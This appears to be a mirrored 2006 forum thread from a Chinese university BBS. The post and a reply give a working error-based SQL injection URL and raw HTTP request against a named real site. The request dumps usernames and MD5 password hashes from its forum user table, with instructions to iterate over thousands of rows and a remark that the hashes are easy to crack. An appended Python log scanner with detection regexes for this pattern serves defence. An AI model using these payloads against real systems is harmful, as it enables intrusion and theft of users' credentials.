Found an injection point:
http://www.byr.edu.cn/news/shownews.asp?id=4129
Submitted via a raw socket:
GET /news/shownews.asp?id=4129%20And%20char(124)%2B(Select%20Top%201%20isNull(cast([username]%20as%20varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([password]%20as%20varchar(8000)),char(32))%2Bchar(124)%20From%20(Select%20Top%2049%20[username],[password]%20From%20[SecondHand]..[byrforum_userdb]%20Where%201=1%20Order%20by%20[username],[password])%20T%20Order%20by%20[username]%20desc,[password]%20desc)>0 HTTP/1.1
User-Agent: Internet Explorer 6.0
Host: www.byr.edu.cn
Cookie: ASPSESSIONIDACSBBTCQ=IDNFEDLBGKNBNHGHODLINIMF
Take the part Select%20Top%2049%20[username],[password]%20From%20[SecondHand]
and change the 49 in %2049 to any other value from 1 to 22000. Submit it, and in the result search for the string "Microsoft OLE DB Provider for SQL Server (0x80040E07)";
what follows it is the corresponding user's username and password.
The usernames and passwords here are from the old BYR forum.
The passwords are MD5 hashes; there are plenty of ways to crack them!
This is a mirrored post. Source: 北邮人论坛 (BYR forum) / soft-design / #5236, synced on 2006/3/29.
Posted by the SoftDesign bot
SQL injection in the BYR news system
Lonhero
2006/3/29, mirror sync, 2 replies
2 replies
Posting the decoded version for the OP:
http://www.byr.edu.cn/news/shownews.asp?id=4129 And char(124)+(Select Top 1 isNull(cast([username] as varchar(8000)),char(32))+char(124)+isNull(cast([password] as varchar(8000)),char(32))+char(124) From (Select Top 24 [username],[password] From [SecondHand]..[byrforum_userdb] Where 1=1 Order by [username],[password]) T Order by [username] desc,[password] desc)>0
http://www.byr.edu.cn/news/shownews.asp?id=4129%20And%20char(124)%2B(Select%20Top%201%20isNull(cast([username]%20as%20varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([password]%20as%20varchar(8000)),char(32))%2Bchar(124)%20From%20(Select%20Top%205000%20[username],[password]%20From%20[SecondHand]..[byrforum_userdb]%20Where%201=1%20Order%20by%20[username],[password])%20T%20Order%20by%20[username]%20desc,[password]%20desc)>0
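A defender-side check for the request pattern shown in this thread (the raw request in the original post and the decoded URL in the reply), as an added example that is not part of the original thread: a small Python scanner that URL-decodes IIS W3C-style log entries and flags query strings carrying the error-based cast(... as varchar) / char(n)+ ... >0 signature that makes SQL Server echo a row back through conversion error 0x80040E07. The log lines, IP addresses and field layout are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C-style log lines: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status.
# The second entry carries the query string from the post above; IPs and statuses are made up.
SAMPLE_LOG = """\
2006-03-29 10:15:01 192.0.2.10 GET /news/shownews.asp id=4129 200
2006-03-29 10:15:07 192.0.2.10 GET /news/shownews.asp id=4129%20And%20char(124)%2B(Select%20Top%201%20isNull(cast([username]%20as%20varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([password]%20as%20varchar(8000)),char(32))%2Bchar(124)%20From%20(Select%20Top%2049%20[username],[password]%20From%20[SecondHand]..[byrforum_userdb]%20Where%201=1%20Order%20by%20[username],[password])%20T%20Order%20by%20[username]%20desc,[password]%20desc)>0 500
2006-03-29 10:16:30 198.51.100.7 GET /news/shownews.asp id=4130 200
"""

# Signatures of the error-based technique described in the post: a string assembled with
# char()/cast(... as varchar) is compared numerically (>0), so the server's type-conversion
# error (0x80040E07) prints the selected row inside the error page.
SIGNATURES = [
    re.compile(r"\bcast\s*\(.+?\bas\s+(n?varchar|char)\b", re.I | re.S),
    re.compile(r"\bchar\s*\(\s*\d+\s*\)\s*\+", re.I),
    re.compile(r"\bselect\s+top\s+\d+\b", re.I),
    re.compile(r"\)\s*>\s*0\s*$", re.I),
]


def is_error_based_sqli(raw_query: str, min_hits: int = 3) -> bool:
    """Return True when the URL-decoded query string matches at least min_hits signatures."""
    decoded = unquote_plus(raw_query)
    # Collapse whitespace so %20, '+' and tabs cannot split the tokens we look for.
    decoded = re.sub(r"\s+", " ", decoded).strip()
    hits = sum(1 for sig in SIGNATURES if sig.search(decoded))
    return hits >= min_hits


def scan_log(text: str) -> list:
    """Return (client ip, sc-status, decoded query) for every suspicious request in the log."""
    findings = []
    for line in text.splitlines():
        fields = line.split(" ")
        if len(fields) < 7 or fields[0].startswith("#"):
            continue  # skip header and malformed lines
        ip, query, status = fields[2], fields[5], fields[6]
        if is_error_based_sqli(query):
            findings.append((ip, status, unquote_plus(query)))
    return findings


if __name__ == "__main__":
    for ip, status, query in scan_log(SAMPLE_LOG):
        print(f"{ip} status={status} query={query[:80]}...")
```

A 500 status on a flagged request is a strong hint that the conversion error actually fired; a 200 may mean the application caught the error, so the query pattern alone should drive the alert.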